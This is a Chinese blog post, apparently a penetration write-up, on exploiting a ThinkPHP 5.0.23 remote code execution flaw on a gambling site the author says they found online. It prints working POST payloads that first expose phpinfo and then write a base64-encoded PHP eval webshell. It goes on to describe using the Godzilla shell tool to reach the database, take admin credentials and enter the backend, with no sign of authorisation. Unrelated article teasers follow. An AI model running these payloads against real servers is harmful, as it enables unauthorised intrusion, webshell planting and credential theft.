站在大神宽阔的肩膀上复现菠菜漏洞

简介: 站在大神宽阔的肩膀上复现菠菜漏洞

01    前提


在早些时候看到先知上有一篇关于thinkphp  rce的菠菜文章


https://xz.aliyun.com/t/6267


于是顺着师傅的思路也来试试


从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了




02 geshell之路


通过报错的方式发现了当前的版本为


ThinkPHPV5.0.23



通过师傅的思路,先去找phpinfo界面


http://127.0.0.1/index.php?s=captcha



POST数据:


_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()




成功拿到phpinfo界面

查看下这里禁用了贼多的命令


那尝试写一下一句话木马吧,按照师傅写的参考里面使用了很多次都没有效果,此时一度陷入僵局。


后来经过不断的fuzz发现,这里获取phpinfo界面的方式还有post的,后端可以同时接收getpost的数据。






知道这个之后,按照师傅文章的提示进行如下的数据构造:


_method=__construct&filter[]=assert&method=post&server[REQUEST_METHOD]=file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))


将一句话木马进行加密






命令执行成功,get到shell





03 进后台


在路径:


/www/wwwroot/xxxxx/application/

发现数据库配置文件



蚁剑连接数据库失败:




使用哥斯拉连接数据库成功



查询到后台的账号和密码,在后台中翻到了后台地址(啊,这还不如直接猜。。。。)




登陆后台成功




04 总结


这次主要是踩在师傅宽大的肩膀上成功getshell的,但是还没能进行提权,命令直接被禁用,等下次有时间的时候再搞吧,溜了溜了


相关文章
|
机器学习/深度学习 人工智能 自然语言处理
人工智能技术介绍
【10月更文挑战第14天】 人工智能技术介绍
|
小程序 JavaScript
最新微信小程序反编译工具,完美解决分包问题
看了很多反编译、找回微信小程序源码很多教程,各种问题导致都没法正常使用。微信版本升级后,会遇到各种报错, 以及无法获取到wxss分包无法反编译的问题。于是寻找资料,也买过别人的破解工具,最终解决文件缺失和分包问题,而且无意中发现还能获取小游戏的源码,于是和大家分享下。
最新微信小程序反编译工具,完美解决分包问题
|
6月前
|
存储 小程序 前端开发
开源版婚恋社交系统:基于PHP开发,集成实时音视频匹配、IM聊天、邀约组局与红娘管理模块的小程序!
系统基于uni-app+PHP全开源架构,支持1V1音视频、IM聊天、兴趣组局、红娘匹配等功能,覆盖都市社交、线上相亲、线下活动等多元场景,助力高效交友与婚恋服务,跨端兼容,灵活二开。
587 1
|
人工智能
🎨 设计师必备!AI Stable Diffusion 提示词神器,让你秒变创意大师!
AI绘图新时代来临,设计师必备工具——**白盒子AI绘图提示词生成器**助你轻松跨越提示词难题。该工具操作简便,支持中英文切换,涵盖近1000个精选提示词,适用于各种风格创作。无论是新手还是专业设计师,都能大幅提升工作效率,快速实现创意构想。网址:[https://www.baihezi.com/ai-painting-prompt](https://www.baihezi.com/ai-painting-prompt)
1239 19
🎨  设计师必备!AI Stable Diffusion 提示词神器,让你秒变创意大师!
|
存储 消息中间件 缓存
支持百万人超大群聊的Web端IM架构设计与实践
本文将回顾实现一个支持百万人超大群聊的Web端IM架构时遇到的技术挑战和解决思路,内容包括:通信方案选型、消息存储、消息有序性、消息可靠性、未读数统计。希望能带给你启发。
734 0
支持百万人超大群聊的Web端IM架构设计与实践
|
存储 数据管理 测试技术
构建Python构建自动化测试框架(原理与实践)
当谈到软件质量保证时,自动化测试是一个不可或缺的步骤。Python作为一种简单易学的编程语言,具有丰富的测试框架和库,使得构建自动化测试框架变得相对简单。本文将介绍如何使用Python构建自动化测试框架,包括选择合适的测试框架、编写测试用例、执行测试和生成报告等方面。
构建Python构建自动化测试框架(原理与实践)
|
安全 Ubuntu Unix
一文带你了解OpenVAS扫描器使用
一文带你了解OpenVAS扫描器使用
|
安全 Linux Python
【安全狗】linux免费服务器防护软件安全狗详细安装教程
【安全狗】linux免费服务器防护软件安全狗详细安装教程
1720 0
|
数据采集 供应链 Oracle
分享52个Java源码,总有一款适合您
分享52个Java源码,总有一款适合您
555 0
|
Linux 网络安全 数据安全/隐私保护